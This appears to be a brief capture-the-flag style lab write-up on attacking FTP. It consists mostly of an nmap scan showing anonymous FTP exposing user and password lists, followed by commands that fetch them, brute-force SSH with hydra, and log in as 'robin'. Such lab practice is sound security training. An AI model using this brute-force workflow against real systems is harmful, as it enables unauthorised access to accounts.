Attacking FTP
May 21, 2024
Last updated
May 21, 2024
Last updated
# Nmap 7.94 scan initiated Tue May 21 21:07:36 2024 as: nmap -sC -sV -oN nmap -vv 10.129.203.160
Increasing send delay for 10.129.203.160 from 0 to 5 due to 29 out of 95 dropped probes since last increase.
Increasing send delay for 10.129.203.160 from 5 to 10 due to 11 out of 17 dropped probes since last increase.
Increasing send delay for 10.129.203.160 from 10 to 20 due to 11 out of 16 dropped probes since last increase.
Increasing send delay for 10.129.203.160 from 20 to 40 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.129.203.160 from 40 to 80 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.129.203.160 from 80 to 160 due to 11 out of 28 dropped probes since last increase.
Nmap scan report for 10.129.203.160
Host is up, received conn-refused (0.84s latency).
Scanned at 2024-05-21 21:07:39 PST for 461s
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEtihrnXMQHWhwZCWFPcX8gmBy8EEBjJ9T5lR/9onJz7XvUdcPTsaOovhhVrgFaQu1U5ekn4V+OYuIxJrEfl0dcBhSqQSb81MO3bTK5yZ+rQ958rl5PiYwKGeFc0VR9P3abEdKRn7bcEoXKSRoMof6vwkJMzb5N/7JBFYUo/jfbzovKEkX4t4Bwh6W4dmcPL6Mh4DJjhaHX6qZcC4MZoOV2oLW82T0tfH/KNLsMXBJ/Yqh8GziGy+jcLl31abch2+inXHTdKhoCOHR+A970VjskUs2iWCRsNkYREtTtpCZ738m1gdMQS+BzV2ZhRRcDnGOXMzR7Rk5Azs+luaGNzRlb1q2+NSQlmGzgBEPvIoL4/pBDM3fb8ZiL4gWvq3bqyPGdOi2nZfbpyeYzAqUe6THRvwjAS1wWUMLNt6jgt13xCTVOZV4hKMmLneb/VQXRoDFBF/vFoFDiPxeVNaM7dvBVQIBYbkBLqjYLVV1IFr2otRIbtVrLU+/D/mJvmXM3Xs=
| 256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrNZZh3PTca9YkLp+xpAXtquE6wsTwEZmBtt6mism0idkizZWojfLqjeonge0ZYBEfXjTgMsfJ366hpWedHE8U=
| 256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlAiOeV++/9T5HzXC37wJRor3PaSuVOGLaNFz7pEl1/
53/tcp open domain syn-ack ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
139/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
2121/tcp open ftp syn-ack ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 1959 Apr 19 2022 passwords.list
|_-rw-rw-r-- 1 ftp ftp 72 Apr 19 2022 users.list
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24965/tcp): CLEAN (Couldn't connect)
| Check 2 (port 55299/tcp): CLEAN (Couldn't connect)
| Check 3 (port 37941/udp): CLEAN (Failed to receive data)
| Check 4 (port 28895/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-05-21T13:14:26
|_ start_date: N/A
| nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ATTCSVC-LINUX<00> Flags: <unique><active>
| ATTCSVC-LINUX<03> Flags: <unique><active>
| ATTCSVC-LINUX<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_clock-skew: 7s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 21 21:15:20 2024 -- 1 IP address (1 host up) scanned in 463.71 seconds
ftp 10.129.203.160 2121
hydra -L users.list -P passwords.list 10.129.203.160 ssh
ssh robin@IP